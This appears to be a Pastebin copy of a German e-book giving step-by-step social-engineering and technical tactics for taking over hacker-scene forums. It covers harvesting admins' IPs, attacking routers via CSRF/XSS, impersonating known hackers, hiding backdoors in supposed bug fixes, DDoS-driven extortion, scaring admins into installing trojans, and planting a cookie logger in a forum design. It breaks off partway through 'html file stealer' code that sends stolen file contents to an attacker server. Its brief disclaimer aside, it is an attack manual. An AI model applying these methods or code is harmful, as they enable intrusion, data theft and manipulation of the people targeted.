Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #########################################################
- ###Taktiken zum uebernehmen von deutschen Scene-Boards###
- ####################e-book by unnex######################
- #########################################################
- Inhalt:
- Vorwort
- 1. Grundwissen
- 1.1 Software
- 1.2 Teamanalyse
- 1.3 Usernamen & IP's
- 1.4 Vertrauen, Fame, Ressourcen & Kontakte
- 2. Vorbereitung
- 2.1 IP's besorgen
- 2.2 bugs suchen
- 2.3 Faming
- 2.4 Board-interessen
- 2.5 Kontakte knuepfen
- 3. Angriffs-Taktiken
- 3.1 der Helfer in der Not
- 3.1.1 Bug fixen
- 3.1.2 Botnet o. crashen
- 3.1.3 Maleware
- 3.1.4 modding
- 3.2 biete & suche
- 3.2.1 tolles Tool
- 3.2.2 Tutorial als htmldatei
- 3.2.3 mein Nolog, loggt
- 3.3 meine Projekte
- 3.3.1 meine Crew
- ---
- Vorwort:
- Dieses E-Book beschreibt Methoden zum Cracken von deutschen Hackerscene-Boards.
- Es beschreibt Methoden und Vorgehensweisen sowie wichtige Informationen
- die das Hacken eines Scene-Boards moeglich machen. Die hier beschreibenen
- Informationen und Angriffs-Taktitken sind von mir selbst
- des oefteren erfolgreich eingesetzt wurden. Dieses E-Book bezieht sich NUR
- auf Social-engeneering Angriffe.
- Wer dieses E-Book liest sollte sich darueber im klaren sein das es zur aufklaerung
- der Sicherheitsschwachstellen in deutschen Sceneboards dient. Und es dem zu folge
- eine Informationsquelle zur behebung dieser Schwachstellen darstellt.
- Es ist also kein Book of dead gegen die Scene. Es ist ein E-Book das den Admins
- lediglich Schwachstellen offenlegen soll damit sie diese dann beheben und beachten
- koennen. Alle hier beschrieben Angriffs-Taktiken beziehen sich auf Social engneering
- und sind somit sehr variierbar einsetzbar.
- 1. Grundwissen
- In den nachsten Unterpunkten werden grundlegende
- Informationen ueber Scene-Boards und ihre Struktur
- sowie die Teammitglieder und deren eigenschaften
- beschrieben.
- 1.1 Software
- Wie der Name schon sagt bestehen "Scene-Boards" aus
- Forensoftwares. Hierbei koennte man davon ausgehen
- das diese selber programmiert werden. Dem ist aber
- nicht so. Ich habe noch nie ein Scene-Board gesehen
- das selbst programmiert wurde, und werde wohl auch
- nie eins zu Gesicht bekommen. Folglich werden hier
- ausnahmslos, mehr oder weniger bekannte, schon existente
- Forensysteme, genutzt. zb im deutschen Sprachraum
- wird sehr oft auf: smf, vbulletin, wbb, phpbb und mybb
- zurrueck gegriffen. In China ist derzeit "discuz"
- der Renner usw...
- In diesem E-Book moechte ich mich aber auf die deutsche
- Scene beschraenken.
- Nicht nur die Forensysteme selber sondern auch die
- dazugehoerigen Mods und Addons werden nur in den
- aller seltensten faellen selbst oder teils selbst
- programmiert.
- Demnach kann man also davon ausgehen das die Admins
- und Teammitglieder der Boards recht wenig ahnung
- vom Source ihrer Forensoftware haben.
- Zu erklaeren ist dieser Zustand mit mangelnden
- programmiererichen Kenntnissen des deutschen
- Undergrounds.
- Diese Tatsachen wirken jetzt auf den ersten Blick
- unwahrscheinlich. Sind aber das ganze Gegenteil
- und Bestandteil der moeglichkeiten zum hacken
- eines Scene-Boards. Aber dazu spaeter.
- 1.2 Teamanalyse
- In den letzen Jahren hat der Anteil an Cardern
- in der Scene einen ueberdimensionalen Zuwachs bekommen.
- Was dazu gefuehrt hat das wirkliche Hacker & Programmierer
- meist nur noch die Leute sind die schon zum alten Eisen gehoeren.
- Das fuehrt uns wiederum zu einer anderen Tatsache.
- Die scene besteht zum großteil aus Jugendlichen und halben Kindern.
- Somit ist es sehr unwahrscheinlich das ein Board von qualifizierten
- und erfahrenen Administratoren geleitet wird. Mitwrikend bei dieser
- Tatsache ist auch das viele von den alten Hasen frueher oder spaeter
- aus der Scene aussteigen oder einfach White-hat's werden.
- Was nicht zuletzt am erschreckend niedrigen Durchschnittsalter
- und den dazugehoerigen Verhaltensweisen der Scene'ler liegt.
- Also, wenn man ein Scene-Board ownen will ist es wichtig vorerst
- das Team unter die Lupe zu nehmen. In den meisten Faellen
- wird man auf Juenglinge ohne programmiereriche Kenntnisse stoßen.
- Sollte dem nicht so sein dann ist es wichtig die einzelnen Personen
- und ihre Eigenschaften und Raenge im Team zu erkennen.
- Zb. Wer ist der Coder ? Wer der gfx'er ? Wer gehoert alles zu den
- normalen Mods. etc...
- 1.3 Usernamen & IP's
- Im Underground ist es schon fast zum Volksport gewurden mehr als einen
- Username zu besitzen. Viele Scene-Mitglieder aendern also staendig oder
- speziell fuer verschiedene Projekte ihre Usernamen. Sollte man jetzt also
- den Username eines Admins kennen, so ist es wichtig diesen nicht als Dogma
- dessen Internet-Identitaet an zu sehen. Dinge wie icq-Nummern, E-Mailaddressen,
- Signaturen... koennen dabei helfen noch andere Usernamen der bertroffenen
- Personen herraus zu finden. Hierbei ist an zu merken das ein Scene'ler
- niemals oder so gut wie nie, nur auf einem Board angemeldet ist.
- Ein weiterer Volkssport ist das dauerhafte anonyme Surfen. d.h. viele
- nutzen vpn's oder sock's dauerhaft oder zumindest immer wenn sie auf ihrem
- Board unterwegs sind. Was uns als Angreifer natuerlich nicht entgegen kommt.
- Deshalb ist es wichtig sich nie auf die IP-Adresse des Opfers zu verlassen.
- Selbst wenn diese als dynamiche IP ausgezeichnet ist. Denn auch hier ist es
- moeglich das der jenige einen Privatrechner infiziert hat und dessen Anbindung
- nun als socks nutzt. Man sollte also zum erspaehen der IP des Opfers immer
- Methoden nutzen bei denen man sich moeglichst sicher sein kann das man auch seine
- real IP bekommt.
- 1.4 Vertrauen, Fame, Ressourcen & Kontakte
- Wie schon erwaehnt ist der Großteil der Scene nicht sehr bewandert was das
- Hacken, insbesondere alte und weniger uebliche Hackingmethoden betrifft.
- In vielen Faellen ist es also recht einfach diese Leute zu beeindrucken oder
- sie von deinem Koennen zu ueberzeugen. Zb. Weist du was eine session fixation ist
- oder ein tpl-inject oder eine array function escalation ? Ob du es nun weist oder nicht,
- ich kann dir versichern in der Scene wissen es nur die wenigsten bis ueberhaupt niemand.
- Solches wissen ist sehr wichtig fuer dich. Damit kannst du zeigen wieviel du weist
- und das du mehr weist als Andere. Und dieses wissen kannst du zum festigen deiner Rolle
- als richtiger Hacker bestens verwenden.
- ----------------------------
- (groß und kleinschreibung mach ich ma spaeter... XD bin jetzt zu faul das weiter zu korrigieren XD)
- ----------------------------
- der fame an sich ist natuerlich auch eine gute grundlage fuer einen erfolgreichen angriff.
- seltsamerweise wird fame oft mit vertrauen gedankt. dein fame in der scene kann also
- zu einem maechtigem trumpf bei angriffen auf scene-boards werden. allerdings fuehrt fame
- auch zu vielen neidern die sich nicht selten zu richtigen hatern entwickeln.
- im grunde ist das auch kein wunder wenn man das alter dieser "hater" und der scene
- allgemein betrachtet. sollte man jetzt also versuchen den admin eines boards mittels
- fame ein zu wickeln dann ist es einfach nur notwendig darauf zu achten das dieser admin
- kein hater des fames ist den du einsetzt.
- eine weitere nuetzliche sache ist das vorhandensein der richtigen kontakte und ressourcen.
- mit kontakten und ressourcen meine ich kontakt zu den boardadmins und der scene selber
- sowie den besitz einiger server zum hosten oder socks zum usen. ebenso etwas wissen
- im crashen von servern oder evtl. ein kleines botnet dein eigen nennen.
- 2. vorbereitung
- an diesem punkt werde ich jediglich beschreiben wie man sich einige nuetzliche informationen
- beschafft die fuer die verschiedenen angriffstaktiken hilfreich oder sogar notwendig sind.
- 2.1 ip's besorgen
- wie schon gesagt nutzt die scene forensysteme die sie einfach ziehen und hochladen und nach
- belieben aufmodden. jeder der ein bisschen erfahrung in sachen hacking hat kann sich
- jetzt ausmahlen wie einfach ein spionage angriff auf die ip eines users waere. diese
- forensysteme erlauben es grafiken von entferneten server ein zu binden. nutzt man jetzt also
- das prinzip des webbugs (zaehlpixel problematik) dann ist es ein kinderspiel die ip
- des gegenueber zu ermitteln. wir laden eine grafik auf einen unserer server hoch und haengen
- sie uns im forum als signatur an. oder schicken sie im bbcode bei einer privaten nachricht mit.
- anschließend sehen wir dann bei uns in die serverlogs und suchen uns raus welche ip wann
- unsere grafik aufgerufen hat. diese methode klappt auch bei vielen messanger darunter auch icq 7.
- alternativ zu dieser methode kann man das opfer auch dazu bringen es auf einen link klicken
- zu lassen um dann dort die ip per serverlogs oder zb php zu loggen.
- eine weitere moeglichkeit waere zb. ihm einen sock an zu bieten. wenn er dann versucht den sock
- zu usen koennen wir alles fein saeuberlich mitloggen incl. ip.
- diese methoden sind natuerlich
- nicht die einzigen. wie sich jeder denken kann gibt es zig methoden um an die ip oder die
- proxy ip des opfers zu gelangen.
- nun ist es aber so das viele sceneuser dauerhaft hinter einem proxy oder aehnlichen sitzen.
- hierbei empfehlen sich methoden bei denen man sich moeglichst sicher sein kann die richtige
- ip zu bekommen. eine moeglichekeit waere zb. ein angriff auf den router des opfers. natuerlich
- kann man die meisten router nicht direkt uebers internet angreifen. und ueber wlan auch nicht
- da man nicht weis wo er ist. ebenso kann das wlan des routers sehr gut verschluesselt. ein angriff
- uebers internet auf den router des opfers wirkt also geradezu absurt. doch gerade deswegen
- ist diese angriffsart fuer uns interessant. niemand wuerde erwarten das ein angreifer aus dem
- internet heraus und ohne den opferrechner zu infizieren und ohne das der router aus dem internet
- erreichbar ist, im stande ist den router an zu greifen. diese tatsache fuehrt dazu das alle
- angriffe die von außen kommen mittlerweile recht gut zu verhindern sind. allerdings wird dabei
- das internet vernachlaessigt. viele user fuehlen sich mit ihren macfiltern und wpa2 schluesseln
- so sicher das sie nicht daran denken ein ordentliches router passwort zu setzen. die meisten router
- haben also die standartlogin daten drinn und als authentifikation ausgewaehlt. wir koennen uns also
- per csrf in den router einloggen bzw. unser opfer macht das fuer uns unbewusst. dabei ist es
- natuerlich wichtig moeglichst viele routerarten in unser script ein zu binden. also, loggt das opfer
- sich jetzt per csrf in den router so koennten wir ueber einen xss bug im router alle infos
- die der router hat beschaffen. so unglaublich wie es klingt. aber sehr, sehr viele router-firmwares
- haben xss bugs, manche von denen sind sogar nutzbar egal ob jemand eingeloggt ist oder nicht.
- ebenso kommt es auch oft vor das man im eingeloggten zustand den router per csrf oder bloßen link
- resetten kann u.ae.
- 2.2 bugs suchen
- nein hiermit meine ich keine sqli's oder rfi, tpli usw... wenn wir sowas finden wuerden braeuchten
- wir uns keine muehe mehr zu machen diesen text hier weiter zu lesen^^ ich meine bugs bei denen man
- sein opfer mehr oder weniger mit einbeziehen muss. also zb. xss, csrf, session fixation, clickjacking...
- allerdings beschreibe ich hier den einsatz dieser bugs nicht im herkoemmlichen sinne. wir nutzen
- die bugs also nicht aus (in dem sinne wieso sie ueberhaupt bugs sind). sondern wir nutzen sie als
- mittel um unsere scheinbare hilfsbereitschaft an zu bieten. aber dazu mehr bei der beschreibung der
- einzelnen angriffstaktiken.
- das finden solcher bugs ist bei den forensystemen oftmals sehr einfach. es existieren sogar
- sehr oft schon bug reports von aktuellen forensystemen die solche bugs behandeln. zb ist mitte
- 2010 eine xss luecke beim eintragen einer homepage im profil gleich auf mehreren forensystem
- vertreten gewesen. darunter vbulletin, smf, phpbb. bei wbb3.0.x gab es ebenfalls eine xss luecke
- im userprofil. derzeit muesste wbb3.1.3 die neuste version sein. auch diese enthaelt eine session
- fixation die man mit csrf koppeln kann. fuer zb clickjacking sind derzeit so gut wie alle
- forensysteme anfaellig. man merkt also das finden solcher bugs ist sehr wahrscheinlich
- und diese wahrscheinlichkeit erhoeht sich nicht selten kontinuierlich mit der anzahl an mods
- die das board inne hat.
- 2.3 faming
- wie bereits erwaehnt kann fame von großem nutzen sein um das vertrauen des boardadmins zu gewinnen.
- haben wir ein paar news in bekannten it-zeitschriften oder blogs oder aenhlichen dingen dann wird
- uns des oefteren sehr schnell respekt und vertrauen entgegen gebracht. besonders in verbindung mit
- punkt 2.2 ist dieses spezielle vertrauen hilfreich. denn hier bekommen wir einerseits vertrauen
- und andererseits techniches wissen zugeschrieben. wenn wir jetzt also einem admin einen bug
- reporten dann haben wir sehr hohe chancen beim fixen des bugs selber mitwirken zu koennen.
- und dieses selbst mitwirken kann der schluessel zum serverzugriff sein. ebenso vereinfacht
- es das unterjubeln von schadsoftware oder schaedlichen links. mit dem vorwand eine besonders gute
- exploitseite oder ein besonders gutes hackertool geben zu wollen, haetten wir hier recht gute chancen.
- diesen fame kann man natuerlich auch ueber "beeindruckende" taten auf dem board erwirken.
- zb wir schreiben ein paar sehr brauchbare tuts und stellen sie ins board oder verschenken
- einige brauchbare accounts usw...
- ebenso koennten wir uns auch ein paar kontaktpersonen (die zum admin fuehren) zu nutzen machen
- um dem admin ammenmaerchen von unseren "superskills" zu unterbreiten.
- 2.4 board-interessen
- gezielt die interessen des boards aus zu nutzen ist ebenfalls eine brauchbare taktik.
- vorerst sollte man feststellen was dem board fehlt. bzw was die user brauchen. zb
- man laed einen trojaner hoch getarnt als exploitsoftware in der hoffnung der
- admin zieht ihn sich und infiziert sich damit. oder man merkt das der admin oder
- teammitglieder socks brauchen. wenn sie diese brauchen fallen gleich zwei aspekte ins spektrum.
- erstens: man weis nun das sie nicht anonyme im board unterwegs sind und hat leichtes spiel
- bei punkt 2.1
- zweitens: man gibt ihnen einen socks den man selber verwaltet und loggt ihre userhandlungen mit.
- dabei auch die des einloggens in den adminpanel des forums. in der scene weis sowieso keiner wie
- unsicher die socks5 verschluesselung wirklich ist!
- oder man erfaehrt dass das board ein neues design brauch. man macht eins+spielereien mit javascript
- und hinterlaesst in diesen ein paar xss bugs. die uns bei 2.2 natuerlich einen freibrief schenken
- wuerden.
- oder der admin muss umhosten weil er den server nicht mehr bezahlen kann. wenn ihr ihn dazu bringt,
- ihn bei euch hosten zu lassen... ;-)
- es gibt also viele interressen die vielseitig ausgenutzt werden koennen.
- 2.5 kontakte knuepfen
- das beschaffen der richtigen kontakte kann von großem nutzen sein um zb. seine autoritaet oder
- glaubwuerdigkeit zu festigen. hierbei ist es wichtig, ueber welchen weg auch immer, einen
- kontakt zum admin zu bekommen. wuerden wir zb. kontakt zu einem teammitglied bekommen dann koennten
- wir dieses nutzen um uns bei dem admin einen namen zu machen.
- 3. angriffs-taktiken
- alle bis jetzt genannten dinge sind wichtig fuer diesen punkt und dienen als fundament fuer
- die nachfolgenden angriffs-taktitken.
- 3.1 der helfer in der not
- hierbei erzwingt man bewusst situationen bei denen man den admin seine hilfe anbieten kann
- oder vom admin darum gebeten wird.
- 3.1.1 bug fixen
- bei dieser methode ist es wichtig den richtigen fame und die richtigen bugs mit ein zu bringen.
- als erstes suchen wir uns den fame. hierzu nehmen wir uns einen hacker der in einigen
- scene news erwaehnt wurde. diese identitaet nehmen wir nun an. dabei sollten wir moeglichst
- darauf achten das der admin des boards keinen kontakt zu dieser fame-person hat und das diese person
- keine kontaktmoeglichkeiten oeffentlich im netz bereit stellt. also moeglichst jemand nehmen
- der nur mit username in den news zu finden ist. nun stellen wir uns auf dem board mit unserer
- identitaet vor und bringen in unseren vorstellungsthread unsere newseintraege ein und haengen
- uns noch ein paar bemerkenswerte programmiereriche faehigkeiten an. dann warten wir erstmal
- ein bisschen ab und sehen wie die member auf unsere vorstellung reagieren. rund einen tag warten
- und reinschauen. in den meisten faellen werden wir herzlichst begruest und werden sogleich mit
- anfaenger fragen uebers hacken und tutanfragen bombadiert. diesen anfragen gehen wir so schnell
- wie moeglich nach um unseren status als richtig guter hacker zu festigen. ist das getahen dann suchen
- wir einen bug auf dem forum. also wie schon beschrieben in "2.2 bugs suchen". diesen bug reporten
- wir dem admin oder coder des boards. beim reporten ist es sehr wichtig viel fachchinesich mit ein zu
- bringen und den bug moeglichst kompliziert darzustellen und ihm weitreichende auswirkungen zu zu
- schreiben. ebenfalls ist es wichtig den bug so dar zu stellen das es aussieht wie als koennte man
- ihn nur schwer fixen. anschließend warten wir die reaktion des gegenueber ab und sehen ob er weis
- was zu tuhen ist oder nicht. wenn er es nicht weis bieten wir ihm prompt unsere hilfe an.
- wenn er weis was zu tuhen ist. muessen wir schnellstmoeglich gegenargument fuer seine ideen einbringen.
- also zb wenn wir ihm einen xss bug reporten und er mein er wird einfach " oder > ausdeclarieren
- dann antworten wir ihm das dies nicht ausreichend ist da man zb mit etwas glueck diese zeichen
- mit unbekannten zeichen die man davor stellt erzwingen kann. oder das die function die man zum
- ausdeclarieren nutzt ja wieder eine array function escalation moeglich machen koennten usw.
- haben wir es geschafft dem admin weis zu machen dass das fixen des bugs nicht so einfach ist
- wie er denkt dann ist es an der zeit eure hilfe an zu bieten. am besten ihr sagt noch das ihr das
- schon ein paar mal gemacht habt und wisst worauf ihr achten muesst. und das bestimmt recht schnell
- gehen wird den bug zu fixen. nun stellt sich die frage: in wie weit koennt ihr mitwirken beim fixen
- des bugs ? an dieser stelle moechte ich ein paar moegliche varianten beschreiben.
- -er gewaehrt euch server zugriff damit ihr den bug fixen koennt.
- jetzt ist natuerlich klar was ihr macht. ihr fixed den bug und baut zugleich ein kleines backdoor
- in den source ein. achtet darauf das das backdoor moeglichst tief im source versteckt ist
- und aus zb. rund 2-3 zeile besteht und variablen namen moeglichst angepasst an andere variablen
- im source sind.
- -ihr bekommt die betroffene sourcedatei geschickt und sollt sie ihm gefixed geben
- damit er sie selber hochladen kann.
- wieder fixt ihr den bug baut ein backdoor ein.
- -er gibt euch remote zugriff auf seinen rechner und will zusehen wie ihr den code fixt.
- das kann ein gewagtes manoever werden aber es ist durchaus machbar. ihr nehmt euch einen
- code zum fixen der moeglichst lang ist. am besten so lang das niemand lust haette
- diesen nochmal zu untersuchen. diesen kopiert ihr im dann in seine phpdatei. in euren
- fix code habt ihr natuerlich wiederum ein kleines backdoor eingebaut. es kann auch nicht
- schaden den code ueber die ganze datei auf zu teilen und das fixen bei dem der admin zusieht
- sehr schnell von statten gehen zu lassen. so das der admin schon beim sehen sichtlich
- uebefordert wird.
- sollte der seltene fall auftreten und euer opfer fixed den bug selber dann ist es wichtig
- einen neuen zu finden. bzw die von euch genannten gegenargumente auf seinen fix wirken zu lassen.
- in den meisten faellen klappt das auch und ihr koennt ihm beweisen das er den bug nicht selber
- fixen kann. in diesem fall habt ich dann hoechstwahrscheinlich eine der drei so eben genannten
- varianten zur auswahl. habt ihr es dann geschafft dem source euren abckdoor unter zu jubeln,
- dann muesst ihr nur noch warten bis keiner mehr vom team auf dem board online ist. also moeglich
- mitten in der nacht. dann koennt ihr in aller ruhe euer backdoor nutzen und den server uebernehmen.
- 3.1.2 botnet o. crashen
- bei dieser methode sind wir vor allem auf unsere ressourcen angewiesen. es geht zwar auch ohne, und wie
- es ohne geht, beschreibe ich auch. aber man wird merken, die methode ohne ressourcen ist wahrscheinlich
- weniger erfolgreich. vorerst wie es ohne ressourcen geht:
- wir melden uns wieder auf dem betroffenen forum an und stellen uns vor. dabei merken wir an
- das wir ueber ein sehr gutes wissen und sehr viel erfahrung im absichern von servern gegen ddos
- und aehnliche angriffe haben. wenn uns die ersten member "hallo" gesagt haben und wir halbwegs zur
- kenntniss genommen wurden, kanns auch schon los gehen. wir suchen uns einen bug in der serversoftware
- und bringen den server zum absturz. also einen dos bug oder memory corruption usw...
- gelingt uns das, also das wir einen bug finden, dann legen wir das board vortan jedesmal lahm wenn
- teammember oder der admin selber online ist. es wird nur wenige tage oder vllt. auch nur stunden dauern
- bis den boardbetreibern dieser zustand gehoerig auf die nerven geht. folglich werden sie versuchen
- etwas gegen das problem vor zu gehen. jetzt gibt es mehrere moeglichkeit. behebt das team tatsaechlich
- diese bugs dann ist schicht im schacht fuer diese methode. sollten sie es nicht beheben koennen
- dann sind sie logischerweise auf hilfe angewiesen. wenn du glueck hast kommen die admins
- aufgrund deines vorstellungsthreads selbst auf dich. sollte dem nicht so sein, dann ist jetzt schnelles
- handeln gefragt. wir kontaktieren den admin und teilen ihm unser bedauern ueber den zustand des boards
- mit und schlagen ihm vor den server zu sichern. unseren vorstellungsthread erwaehnen wir dabei auch
- um ein bisschen glaubwuerdigkeit mit ins spiel zu bringen. der admin wird uns vorerst kein vertrauen
- schenken. also crashen wir weiter seinen server. diesesmal aber nonstop sobald wir die antwort vom
- admin erhalten haben in der zum ausdruck kommt das er unsere hilfe nicht annimmt. wenn wir der meinung
- sind das wir ihm genug auf den zeiger gegangen sind dann schreiben wir ihn wieder an und bieten ihm
- eine sofortloesung an. also wir bieten ihm ein server script an das ein backdoor enthaelt.
- um den admin weiter ein zu wickeln merken wir an das wir doch so gerne auf diesem board unterwegs
- sind und alles moegliche machen moechten um es wieder online zu bekommen. des weiteren bitten wir
- ihn darum es doch wenigstens mal fuer kurze zeit zu probieren. und wenn es nicht klappt kann er es
- ja wieder runter hauen. mit etwas glueck nimmt er diesesmal unser angebot an. nun muessen wir nur noch
- eine kurze zeit warten zb. eine stunde, und dann stoppen wir unseren angriff auf das board.
- was nun passiert ist klar. wir schreiben den admin an und belatschern ihn permanent, wie toll
- es doch ist dass das script funktioniert. diese aktion soll uns zeit verschaffen bzw den admin
- mit uns beschaeftigen damit wir zeitgleich unseren backdoor ausnutzen koennen bevor der admin das
- script evtl. wieder loescht. sollte der admin diesen vorschlag nicht annehmen und unser script
- nicht nutzen wollen dann geben wir ihm einen tip der an die servereinstellungen gebunden ist.
- also zb logs ausschlaten, mit der aberwitzigen begruendung das man den prozess des loggens damit
- unterbindet und somit das script weniger zu tuhen hat und weniger schnell ueberastet werden kann usw...
- frueher oder spaeter wird er so etwas ausprobieren, was wir ihm vorschlagen. wenn das geschieht
- dann stoppen wir unsere crash angriffe und vernehmen die danksagung des admins, das unser tip
- geholfen hat. nun warten wir eine ganze weile zb. eine woche. dann greifen wir wieder an.
- und wieder bieten wir unsere hilfe an. diesesmal aber mit der begruendung das bei diesem angriff
- mehr gemacht werden muss. wir haben dem admin schon einmal geholfen. diesesmal wird er unser
- serverscript wohl eher annehmen. und wenn er das macht dann haben wir es, wie schon gesagt, geschafft
- und koennen den server uebernehmen.
- nun zur vorgehensweise mit ressourcen.
- natuerlich kann es vorkommen das man den betroffenen server nicht so einfach crashn oder dosen kann.
- in diesem fall muessen wir mit unverhinderbaren mitteln rann. also zb. ein richtig großes botnet.
- wir legen das board erstmal fuer ein paar tage oder stunden lahm. dann schreiben wir den admin
- an und fragen ob er nicht einen besseren server haben will. einen den wir sponsern wuerden.
- im grunde ist es meist nur eine frage der zeit. also wir ddosn so lange bis der admin auf unser
- angebot eingeht. sollte er auf einen anderen server wechseln der nicht zu uns gehoert, dann ddosn
- wir auch diesen server. also, wenn es soweit ist und er unseren vorschlag annimmt dann muessen
- wir nichts weiter machen als zu warten bis er treudoof seine backups und daten auf unseren
- server hochlaed, wo wir sie dann in aller ruhe einsehen koennen. wichtig bei dieser methode
- ist natuerlich das wir bei unserer vorstellung im forum betonen das wir im besitz verdammt guter
- server sind.
- 3.1.3 maleware
- diese methode erfordert besonders viel geschick weil es hier von noeten ist mehrere rollen zu spielen
- die sehr gut aufeinander abgestimmt sein muessen. des weiteren ist diese methode recht langwierig.
- zu erst legen wir uns ein paar accounts auf seinem board an.
- dann besorgen wir uns die ip des admins. danach forschen wir ein bisschen nach. wir brauchen
- ein paar usernamen oder andere internet-addressen auf denen der admin angemeldet ist.
- wenn wir moeglichst viel informationen ueber diese person haben dann schreiben wir ihn an. das machen
- wir aufbrausend und leicht gereizt. also wir schreiben ihn in etwa so an:
- du: na, xxx AKA xxxx und AKA xxxxx. ich hab deine ip 000.00.00.0! und die werden die bullen bekommen ;-)
- (wichtig dabei ist das wir auch wirklich seine real ip haben.)
- der admin wird versuchen sich nichts anmerken zu lassen, und macht einen auf dicke hose und
- das es ihn angeblich nicht interessiert. an dieser stelle verdeutlichen wir ihm das er angeblich
- einen trojaner von uns auf seinem system hat. das machen wir indem wir seine ip ddosn.
- wir warten nun bis er wieder online ist. wenn er wieder da ist erzaehlen wir ihm folgendes:
- du: na soll ich nochma machen ? scan mal dein sys du noob. aber egal, in rund 8 tagen kommen die cops ;-)
- nachdem wir das gesagt haben verschwinden wir einfach ohne weitere worte.
- jetzt lassen wir dem admin ein paar tage zeit. nach 1-2 tagen schreiben wir ihn von unseren board
- accounts an. und erzaehlen ihm das wir gehackt wurden. jeder account sollte dabei einzeln
- richtig am rummheulen sein das er von den bullen hochgenommen wurde. dabei muss mindestens ein account
- genutzt werden um dem admin eine info zu entreißen die wir schon wissen. wir muessen ihn dazu bringen
- das er uns sagt das er von dem angreifer angeschrieben wurde.
- nun sollte dem admin langsam bange werden und er kommt ins gruebeln. wir warten wieder einen tag.
- dann nehmen wir uns einen unserer foren accounts und schreiben ins forum das alle aufpassen
- sollen und nachsehen sollen ob sie infected sind. mit den anderen accs schreiben wir rein
- das wir infected sind. wir warten wieder einen tag. dann schreiben wir den admin an und erzaehlen
- ihm das wir den trojaner auf unserem system gefunden haben und eine software haben mit der man ihn
- aufspuehren kann. wenn wir bis jetzt gut gearbeitet haben und dem admin genug angst gemacht haben
- wird er unsere maleware annehmen und wir haben ihn trojanert.
- 3.1.4 modding
- hier ist es wichtig die richtigen interessen des boards zu erfahren. ich auf nur eine
- moeglichekit eingehen. also, sollte das board ein neues design brauchen:
- wir melden uns auf dem board an und prahlen mit unseren tollen designer skills. mit in den
- vorstellungsthread bringen wir ein paar 0815 designs ein. die allerdings fuer ein anderes
- forensystem sind. dann schreiben wir den admin an und schlagen ihm vor ein design, ein richtig
- gutes design fuer sein board zu machen. er wird diesen vorschlag nicht ablehnen. weil ein design
- ja eigentlich nicht schaden kann und er schlussendlich immernoch nein sagen kann. nebenbei
- machen wir uns weitere foren accounts und erzaehlen von diesen aus, das uns das alte design nicht
- gefaellt. nun ist es an der zeit unsere rolle als helfer einen sinn zu geben. wir fragen den admin
- ob es moeglich waere das wir nachdem neuen design zum gfxer oder aehnlichen ernannt werden.
- der admin wird dieses ganze geschehen wahrscheinlich nur als probesache aufnehmen. wir basteln
- jetzt also das design. und erklaeren das wir uns sehr viel muehe gegeben haben und sogar javascript
- fenster und handlungen fuer tolle effekte mit reingebracht haben. (dem sollte auch wirklich so sein!)
- und jetzt kommt der ausschlag gebende punkt. der admin wird nicht darauf achten das javascript
- gefaehrlicher sein kann als man denkt. wir geben ihm also screens aus dem localmode wo wir
- das design am laufen haben und ueberreden ihn es auf seinem board zu nutzen. was der admin
- dabei uebersieht, ist die gefahr die von unserem javascript code ausgeht. denn in diesen
- code basteln wir einen cookielogger ein. am besten versteckt als iframe. also, location.href+cookie
- und das in nen iframe und verstecken. das sollte reichen. wenn der admin jetzt dieses design
- aufs forum knallt werden die cookies der user permanent auf einen unserer server eubertragen.
- so unglaublich wie es klingt. aber nur die wenigstens bis ueberhaupt niemand sieht sich 100kb js
- dateien die einzeilig sind an, und findet xss backdoors. diese methode ist also unter umstaenden
- eine sehr efektive wahl.
- 3.2 biete & suche
- diese methoden beziehen sich auf das oeffentliche einbringen von tools und aehnlichen dingen ins board.
- also, wir bieten im forum kostenlos tools und tuts an.
- 3.2.1 tolles tool
- zu dieser methode brauch ich wohl nicht viel zu sagen. weil sie ohnehin abgedrochen und nur noch selten
- mit erfolg gekroent ist. wir brauchen ein paar foren accounts und fud
- maleware. diese maleware bieten wir im forum kostenlos an und erklaeren mit den anderen accounts
- wie toll dieses programm doch funzt und wie hilfreich es ist. wenn wir glueck haben dann
- wird auch der admin versuchen unsere maleware zu nutzen. und somit haetten wir ihn als victim in unserer
- trojanerliste.
- 3.2.2 tutorial als htmldatei
- bei deiser methode nutzen wir wieder die unwissenheit des admins aus. zu erst erstellen wir einen
- forenaccount und posten ein paar normalen .txt tutorials. wenn wir genug davon gepostet haben und
- wir sehen das diese auch gelsen werden dann koennen wir ein tutorial reinstellen das nur als
- .html datei verfuegbar ist. bei dieser art von datei wird niemand verdacht schoepfen. besonders
- nicht die deutschen scene'ler XD vorweg brauchen wir allerdings eine wichtig inforamtion:
- wo speichert das opfer die serverdaten ? diese beschaffen wir uns folgendermaßen: wir bringen
- den admin dazu mit uns eine remote-desktop session ein zu gehen. also zb mikogo, teamviewer, vnc... etc.
- gruende dafuer gibt es viele. wir koennten uns zb die handhabung eines bestimmten programms zeigen
- lassen oder einfach begeistert fragen ob wir bei einem hack zusehen duerfen usw.
- haben wir einen grund gefunden und sind verbunden mit unserem victim dann praegen wir uns
- jede datei die wir sehen ganz genau ein. die meisten leute haben dateien wie "serverdats.txt" oder
- aehnliches auf dem desktop. also, wir achten auf jede datei! wenn wir eine datei sehen die, die
- serverdaten enthalten koennte dann haben wir vorerst genug informationen. also zb wir sehen die datei
- "root.txt" auf dem desktop. als unser opfer auf "start" gedrueckt hat in der taskleiste, haben wir den
- username gesehen, der zb bei windows in diesem programmfenster verzeichnet ist. also: server.txt auf dem
- desktop und username ist "ichuser" der pfad zu datei waere dann zb:
- C:\Dokumente und Einstellungen\ichuser\Desktop\root.txt
- web: file:///C:/Dokumente%20und%20Einstellungen/ichuser/Desktop/root.txt
- jedenfalls sofern der user auf c used. wenn nicht muessten wir das aber auch spitz kriegen
- in unserer desktop session. nun koennen wir unser tutorial erstellen. zwischen viel und damit meine
- ich wirklich richtig viel text verstecken wir einen file stealer. ich denke mal sogut wie niemand hat
- bis jetzt von html file stealen gehoert. also nehme ich einen code den ich selber mal verfasst hatte.
- im grunde koennte es sogar sein das diese idee von mir stammt XD weis aber nich ob schonmal
- jemand drauf gekommen is XD
- ---
- ---html file stealer by unnex---
- #########sender.html#########
- <html><head>
- <title>html stealer</title>
- <script type="text/javascript">
- var first = "yes";
- function uebernahme(dat) {
- if(browsertyp == "IE" && first == "no" && dat!=undefined) {
- document.x.textausgabe.value+="\n";
- location.href="http://[server]/annahme.php?log="+escape(document.x.textausgabe.value);
- }
- if(dat!=undefined){
- document.x.textausgabe.value+=dat;
- location.href="http://[server]/annahme.php?log="+escape(document.x.textausgabe.value);
- first="no";
- }
- }
- function read(file) {
